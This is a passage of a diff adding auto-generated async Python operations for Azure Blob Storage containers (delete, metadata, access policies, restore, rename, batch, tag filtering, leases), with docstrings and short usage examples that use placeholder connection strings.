self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', 
response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access')) + response_headers['x-ms-has-immutability-policy']=self._deserialize('bool', response.headers.get('x-ms-has-immutability-policy')) + response_headers['x-ms-has-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-has-legal-hold')) + response_headers['x-ms-default-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-default-encryption-scope')) + response_headers['x-ms-deny-encryption-scope-override']=self._deserialize('bool', response.headers.get('x-ms-deny-encryption-scope-override')) + response_headers['x-ms-immutable-storage-with-versioning-enabled']=self._deserialize('bool', response.headers.get('x-ms-immutable-storage-with-versioning-enabled')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_properties.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def delete( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """operation marks the specified container for deletion. The container and any blobs contained + within it are later deleted during garbage collection. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. 
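+        Example: a minimal sketch (not part of the generated file) of driving this
+        operation through the public ``azure.storage.blob.aio.ContainerClient``, which
+        wraps this generated layer; the connection string and container name are
+        placeholders::
+
+            import asyncio
+            from azure.storage.blob.aio import ContainerClient
+
+            async def main():
+                conn_str = "<storage-connection-string>"  # placeholder
+                container = ContainerClient.from_connection_string(conn_str, "my-container")
+                async with container:
+                    # Marks the container for deletion; its blobs are removed
+                    # later by garbage collection, as described above.
+                    await container.delete_container()
+
+            asyncio.run(main())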
+ :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_delete_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.delete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def set_metadata( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """operation sets one or more user-defined name-value pairs for the specified container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. 
See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "metadata". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "metadata") # type: str + + _lease_id = None + _if_modified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + + request = build_set_metadata_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + metadata=metadata, + if_modified_since=_if_modified_since, + request_id_parameter=request_id_parameter, + template_url=self.set_metadata.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_metadata.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def get_access_policy( + self, + timeout: Optional[int] = None, + 
request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> List["_models.SignedIdentifier"]: + """gets the permissions for the specified container. The permissions indicate whether container + data may be accessed publicly. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "acl". Note that overriding this default value may result + in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: list of SignedIdentifier, or the result of cls(response) + :rtype: list[~azure.storage.blob.models.SignedIdentifier] + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[List["_models.SignedIdentifier"]] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_access_policy_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.get_access_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = 
self._deserialize('[SignedIdentifier]', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_access_policy.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def set_access_policy( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + access: Optional[Union[str, "_models.PublicAccessType"]] = None, + request_id_parameter: Optional[str] = None, + container_acl: Optional[List["_models.SignedIdentifier"]] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """sets the permissions for the specified container. The permissions indicate whether blobs in a + container may be accessed publicly. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param access: Specifies whether data in the container may be accessed publicly and the level + of access. Default value is None. + :type access: str or ~azure.storage.blob.models.PublicAccessType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param container_acl: the acls for the container. Default value is None. + :type container_acl: list[~azure.storage.blob.models.SignedIdentifier] + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "acl". Note that overriding this default value may result + in unsupported behavior. 
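+        Example: a minimal sketch (not part of the generated file) using the public
+        ``azure.storage.blob.aio.ContainerClient`` wrapper; the connection string,
+        container name, and policy id are placeholders::
+
+            import asyncio
+            from datetime import datetime, timedelta
+            from azure.storage.blob import AccessPolicy, ContainerSasPermissions, PublicAccess
+            from azure.storage.blob.aio import ContainerClient
+
+            async def main():
+                conn_str = "<storage-connection-string>"  # placeholder
+                container = ContainerClient.from_connection_string(conn_str, "my-container")
+                async with container:
+                    policy = AccessPolicy(
+                        permission=ContainerSasPermissions(read=True),
+                        start=datetime.utcnow(),
+                        expiry=datetime.utcnow() + timedelta(hours=1),
+                    )
+                    # public_access=PublicAccess.Container makes the container's
+                    # blobs publicly listable and readable; use with care.
+                    await container.set_container_access_policy(
+                        signed_identifiers={"read-policy": policy},
+                        public_access=PublicAccess.Container,
+                    )
+
+            asyncio.run(main())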
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + serialization_ctxt = {"xml": {'name': 'SignedIdentifiers', 'wrapped': True, 'itemsName': 'SignedIdentifier'}} + if container_acl is not None: + _content = self._serialize.body(container_acl, '[SignedIdentifier]', is_xml=True, serialization_ctxt=serialization_ctxt) + else: + _content = None + + request = build_set_access_policy_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + lease_id=_lease_id, + access=access, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.set_access_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_access_policy.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def restore( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + deleted_container_name: Optional[str] = None, + deleted_container_version: Optional[str] = None, + **kwargs: Any + ) -> None: + """Restores a previously-deleted container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. 
Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param deleted_container_name: Optional. Version 2019-12-12 and later. Specifies the name of + the deleted container to restore. Default value is None. + :type deleted_container_name: str + :param deleted_container_version: Optional. Version 2019-12-12 and later. Specifies the + version of the deleted container to restore. Default value is None. + :type deleted_container_version: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "undelete". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "undelete") # type: str + + + request = build_restore_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + deleted_container_name=deleted_container_name, + deleted_container_version=deleted_container_version, + template_url=self.restore.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + restore.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def rename( # pylint: disable=inconsistent-return-statements + self, + source_container_name: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + source_lease_id: Optional[str] = None, + **kwargs: Any + ) -> None: + """Renames an existing container. + + :param source_container_name: Required. Specifies the name of the container to rename. + :type source_container_name: str + :param timeout: The timeout parameter is expressed in seconds. 
For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_lease_id: A lease ID for the source path. If specified, the source path must have + an active lease and the lease ID must match. Default value is None. + :type source_lease_id: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "rename". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "rename") # type: str + + + request = build_rename_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + source_container_name=source_container_name, + timeout=timeout, + request_id_parameter=request_id_parameter, + source_lease_id=source_lease_id, + template_url=self.rename.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + rename.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def submit_batch( + self, + content_length: int, + body: IO, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> IO: + """The Batch operation allows multiple API calls to be embedded into a single HTTP request. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. 
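+        Example: a minimal sketch (not part of the generated file); the public
+        ``ContainerClient.delete_blobs`` helper is one caller that packs several
+        sub-requests into a single multipart batch like the one this operation
+        submits; the connection string and blob names are placeholders::
+
+            import asyncio
+            from azure.storage.blob.aio import ContainerClient
+
+            async def main():
+                conn_str = "<storage-connection-string>"  # placeholder
+                container = ContainerClient.from_connection_string(conn_str, "my-container")
+                async with container:
+                    # The three deletes travel in one multipart/mixed HTTP request.
+                    await container.delete_blobs("a.txt", "b.txt", "c.txt")
+
+            asyncio.run(main())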
+ :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword multipart_content_type: Required. The value of this header must be multipart/mixed + with a batch boundary. Example header value: multipart/mixed; boundary=batch_:code:``. + :paramtype multipart_content_type: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "batch". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "batch") # type: str + + _content = self._serialize.body(body, 'IO') + + request = build_submit_batch_request( + url=self._config.url, + multipart_content_type=multipart_content_type, + restype=restype, + comp=comp, + version=self._config.version, + content=_content, + content_length=content_length, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.submit_batch.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + submit_batch.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def filter_blobs( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + where: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + **kwargs: Any + ) -> "_models.FilterBlobSegment": + """The Filter Blobs operation enables callers to list blobs in a container whose tags match a + given search expression. Filter blobs searches within the given container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. 
Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param where: Filters the results to return only blobs whose tags match the + specified expression. Default value is None. + :type where: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "blobs". Note that overriding this default value may + result in unsupported behavior.
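+        Example: a minimal sketch (not part of the generated file), assuming an SDK
+        version whose public ``ContainerClient`` exposes ``find_blobs_by_tags``
+        (the wrapper for this operation); the connection string, container name,
+        and tag expression are placeholders::
+
+            import asyncio
+            from azure.storage.blob.aio import ContainerClient
+
+            async def main():
+                conn_str = "<storage-connection-string>"  # placeholder
+                container = ContainerClient.from_connection_string(conn_str, "my-container")
+                async with container:
+                    # In the filter expression, tag names go in double quotes
+                    # and tag values in single quotes.
+                    async for blob in container.find_blobs_by_tags("\"env\"='prod'"):
+                        print(blob.name)
+
+            asyncio.run(main())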
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: FilterBlobSegment, or the result of cls(response) + :rtype: ~azure.storage.blob.models.FilterBlobSegment + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.FilterBlobSegment"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "blobs") # type: str + + + request = build_filter_blobs_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + where=where, + marker=marker, + maxresults=maxresults, + template_url=self.filter_blobs.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('FilterBlobSegment', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + filter_blobs.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def acquire_lease( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + duration: Optional[int] = None, + proposed_lease_id: Optional[str] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a + lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease + duration cannot be changed using renew or change. Default value is None. + :type duration: int + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. Default value is None. 
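+        Example: a minimal sketch (not part of the generated file) of the lease
+        lifecycle via the public ``ContainerClient``; the connection string and
+        container name are placeholders::
+
+            import asyncio
+            from azure.storage.blob.aio import ContainerClient
+
+            async def main():
+                conn_str = "<storage-connection-string>"  # placeholder
+                container = ContainerClient.from_connection_string(conn_str, "my-container")
+                async with container:
+                    # A 15-second lease; deletes without this lease id now fail.
+                    lease = await container.acquire_lease(lease_duration=15)
+                    await lease.renew()    # restart the 15-second clock
+                    await lease.release()  # free the container again
+
+            asyncio.run(main())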
